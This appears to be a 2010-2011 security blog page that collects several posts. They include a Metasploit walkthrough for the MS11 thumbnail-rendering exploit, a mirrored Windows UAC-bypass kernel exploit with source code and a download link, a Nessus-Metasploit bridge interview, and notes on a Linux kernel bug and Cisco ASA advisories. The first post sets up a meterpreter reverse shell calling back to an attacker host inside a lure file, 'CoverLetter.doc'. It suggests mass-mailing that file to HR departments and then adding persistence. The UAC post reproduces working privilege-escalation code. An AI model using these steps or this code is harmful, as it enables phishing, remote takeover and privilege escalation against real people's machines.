New Year, New MS Zero Day

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

  • I used Vmware Workstation with two hosts (XP, and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
  • Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home :).

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Advertisements

Windows 0day Exploit Bypass UAC/Priv esculation POC testing

Updated with Q&A section at the bottom.

As referenced in my last post, a public release  proof of concept (POC) for bypassing the  User Access Control (UAC) feature on Windows Vista and 7 operating systems is in the wild. The vulnerability is a buffer overflow in kernel (win32k.sys). The vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key.

The author’s PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges). The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys.

According to the author of the POC code ,” I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCUEUDC[Language]SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.”

POC Test:

Version Windows 7 Professional

Steps:

  1. I first created a standard none privileged user, and from the command prompt typed “whoami” to identify my user, I then typed “net users” to few all available users on the system. Lastly I tried to create a new user with “NET USER testhack P@$$w0rd /add” and received access denied as expected.
  2. Next download the POC code, and extract it to a folder of your choice, then from the command prompt change directory to that folder and execute the “poc.exe” file. From here on you will have escalated privileges of the “nt/system user”.

At this point it’s GAME OVER!!

Updated with a few questions I emailed the author of the POC exploit

Me: How did you get your start in information security?

POC Author: By the randomness of the universe, I started one day when I discovered debugging

Me: How long have you been doing exploit development?

POC Author: I’ve been doing reverse engineering since 2004 but not exclusively in exploit development.

Me: How did you discovered this flaw?

POC Author: By chance when I read WDK or windows driver kit code samples

Me: What steps did you take to notify the vendor about this issue? What time line did Microsoft give for a patch to this issue?

POC Author: This flaw was reported with enough detail and the same PoC released on the internet to Microsoft Security Response Center  MSRC. They didn’t give a time line. Actually the guy who was issued to work on this never contacted me!

Me: Since this disclosure were you contacted by Microsoft or anyone else who were upset about your decision to disclose this flaw?

POC Author: No, despite the fact that my initial CodeProject article were brought down, probably due to the pressure from MS.

Me: Realistically how long do you think it will take before this flaw is patched?

POC Author: First of all I wouldn’t pick a day before Thanksgiving to publish this if I’m not mad enough that this flaw remains unpatched almost a year since Microsoft’s first acknowledge. Due to the nature that the flaw is from the design of an API, and it has been widely used by third party drivers, probably this won’t be entirely fixed until Windows 8. But meanwhile, MS could have taken measures to block such exploits, such as restricting the API not to query certain types of value to avoid ambiguity.

Me: Were you giving a reason by codeprojects for pulling your posting?

POC Author: Yes, they give me the responsible disclosure thing.

Additional comments by author:

If I have to keep my mouth shut until MS release a patch for such exploit, then probably everyone will be threatened more than now, because from what I know, there had been malware which use this exploit since August, not none said by some security companies. Those exploit a registry key ActiveTimeBias which works perfectly on all versions of Windows, to bypass proactive defense and execute malicious code.

I must say thank you for answering my questions and I support your decision for releasing this PoC and details about the flaw, if MS was given a full year to take care of this and they didn’t even respond to you why should you keep quiet!

References:

http://isc.sans.edu/diary.html?storyid=9988

http://www.exploit-db.com/exploits/15609/

Bypassing UAC with User Privilege under Windows Vista/7 **Mirrored**

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

A Design Flaw in Windows Kernel API Leads to Security Breakdown

Download POC code & copy of original posting–> http://www.megaupload.com/?d=D9M0CLDV

Introduction

I would like to present an exploit of an ambiguous parameter in Windows kernel API that leads to buffer overflows under nearly every version of Microsoft Windows, especially one that can be used as a backdoor to Windows user privilege system as well as User Access Control.

The starring API would be RtlQueryRegistryValues, it meant to be used to query multiple registry values by a query table, given the EntryContext field as output buffer. There is a problem that this field can be either treated as a UNICODE_STRING structure or a ULONG buffer length followed by the actual buffer, and this is determined by the type of the registry key being queried.

Using the code

In this example, I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCUEUDC[Language]SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.

Pastebin code –> http://pastebin.com/s6h2VTSc

Stack trace shows the calling process is as follows:

GDI32.EnableEUDC ->
NtGdiEnableEudc ->
GreEnableEUDC ->
sub_BF81B3B4 ->
sub_BF81BA0B ->
RtlQueryRegistryValues (Overflow occurs)

Given this we can design the registry value which will precisely overwrite the return address of the calling function on stack, results in an arbitrary buffer being executed in kernel mode. In my PoC the buffer contains a simple kernel PE loader, which will eventually load a driver that will escalate “cmd.exe” process privilege regardless of UAC.

Pastebin code –> http://pastebin.com/A8hTgCb1

The shellcode need some kernel APIs, we need to get their addresses from the running kernel.

/* code snip

// Get the running kernel file name
HMODULE hDll = GetModuleHandle(L”ntdll.dll”);
pfnZwQuerySystemInformation fnZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(hDll,”ZwQuerySystemInformation”);
PSYSTEM_MODULE_INFORMATIONS pModInfo = NULL;
ULONG AllocSize = 0;
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);

pModInfo = (PSYSTEM_MODULE_INFORMATIONS)malloc(AllocSize);
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
HMODULE hKernel = LoadLibraryExA(pModInfo->modinfo[0].ImageName + pModInfo->modinfo[0].ModuleNameOffset, NULL, DONT_RESOLVE_DLL_REFERENCES);

//Relocation to the running kernel base
DWORD Delta =  (DWORD)pModInfo->modinfo[0].Base – (DWORD)hKernel;

free(pModInfo);

// For Vista, there is a Pool address on the stack which is going to be passed to ExFreePool before the function returns,
// so we need a valid pool address to avoid BSOD.

if(vi.dwBuildNumber < 7600)
{
FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x2C);

HANDLE hDummy = CreateSemaphore(NULL, 10, 10, L”Local\PoC”);
PSYSTEM_HANDLE_INFORMATION pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(sizeof(SYSTEM_HANDLE_INFORMATION));
AllocSize = sizeof(SYSTEM_HANDLE_INFORMATION);
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(pHandleInfo, AllocSize);
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

for(DWORD i = 0; i < pHandleInfo->NumberOfHandles; i++)
{
if((HANDLE)pHandleInfo->Handles[i].HandleValue == hDummy)
{
*(DWORD*)(RegBuf + 0x4) = (DWORD)(pHandleInfo->Handles[i].Object) – 0x18;
break;
}
}
free(pHandleInfo);
}
else
{
FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x30);
}

// Now fills the API addresses needed
FixDWORD(pMem, sizeof(Data), 0x11111111, (DWORD)GetProcAddress(hKernel, “ExAllocatePoolWithTag”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x22222222, (DWORD)GetProcAddress(hKernel, “RtlInitAnsiString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x33333333, (DWORD)GetProcAddress(hKernel, “RtlAnsiStringToUnicodeString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x44444444, (DWORD)GetProcAddress(hKernel, “MmGetSystemRoutineAddress”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x55555555, (DWORD)GetProcAddress(hKernel, “RtlFreeUnicodeString”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x66666666, (DWORD)GetProcAddress(hKernel, “memcpy”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x77777777, (DWORD)GetProcAddress(hKernel, “memset”) + Delta);
FixDWORD(pMem, sizeof(Data), 0x88888888, (DWORD)GetProcAddress(hKernel, “KeDelayExecutionThread”) + Delta);
FreeLibrary(hKernel);

// Here we tell the shellcode(PE loader) where the driver buffer is.
FixDWORD(pMem, sizeof(Data), 0x11223344, sizeof(DrvBuf));
FixDWORD(pMem, sizeof(Data), 0x55667788, (DWORD)pDrvMem);

/end snip

Pastebin code –>http://pastebin.com/PHVmuBmx

Finally, we set the registry value and call GDI32.EnableEUDC to fire the exploit.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

After running this PoC, just type “whoami” in command prompt to see the escalated user credentials.

Points of Interest

All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue.

Additional Information

This PoC may not correctly fix the exploited kernel context and resume execution without BSOD, such as on kernels ealier than 6.1.6000 are not supported, current supported kernels are:
Windows Vista/2008 6.1.6000 x32,
Windows Vista/2008 6.1.6001 x32,
Windows 7 6.2.7600 x32,
Windows 7/2008 R2 6.2.7600 x64.
Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore it is not included.

Contact

Me: nooby@safengine.com

History

Initial release: 2010.11.24

License

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

About the Author

noobpwnftw

Nessus and Metasploit living in harmony

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post, being a fan of both Metasploit and Nessus I was very happy when I saw a tweet a month or so back making mention of a project that would bring both of these wonderful tools together in a nice easy to use fashion. That project was labeled ” Nessus Bridge for Metasploit”. The basic goal behind this project was to  allow you to do various tasks with your Nessus server, from within the msf command line.  By that I mean scan with Nessus, review the results, import the results and then exploit the results.” After reading those few lines form the project home page I was already sold.

What can you do with this plug-in or bridge you might ask?

The commands are broken up into the following categories below and are covered in details over at the http://blog.zate.org .

A few prerequisites are needed before you can start hacking away:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
  • A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

  1. First fire-up  both Metasploit and Nessus and run an update to ensure you have the latest signatures.
  2. Login into Nessus and create your scanning policy
  3. Close out your browser and prepare to have some fun CLI style!
    1. Load up the nessus module within msfconle with “load nessus”
    2. Next connect to your nessus server with “nessus_connect username:password@host:port ok”
    3. From this point on you can view all polices, perform a scan, import the rules and then use db_autopwn to seal the deal.
      Using nessus_policy_list and nessus_scan_new
    4. Import scan results with “nessus_report_get report id”

      db_autopwn

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I’ve not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else
to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

Everything kind of clicked together and I thought what if i could stick that library in Metasploit and talk directly to the my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st’s library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which i used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work :).

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what’s the best approach?Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploitfork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

A: You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github. Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code
when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.

Second time’s a charm “Linux Kernel 0-day bug”

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

//

The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

Sample exploit is already in the wild as show via http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not a expert in exploit development or analysis I will sit back and wait for the guys over at Metasploit or SET to whip up so I can test.

Month of Abysssec Undisclosed Bugs

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (http://www.exploit-db.com), averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:

1– http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/

2 — http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerability/

Enjoy,
Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

Multipple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04”

I received notification of the following vulnerabilities outlined below via the full disclosure mail list but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organization depend on their Firewall as the primary means of protection against the many threats on the  internet.

The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

SunRPC Inspection Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

Transport Layer Security (TLS) Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

As a side note I would like to add that unless you are already running on version 8.3 you should disable the vulnerable services and take a moment to read the release note for version 8.3.

The are some syntax changes you have to adjust too, as well as do a full rule set conversion. Below is an example of an old rule and its recommended migrated counterpart. Some of the migrated rules and not all new since the were supported in older IOS version, however its now mandatory to do them the proper/recommended way instead of the older way.

Old Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Migrated Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 access-list 1 extended permit tcp any host 10.50.50.50 eq 80

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside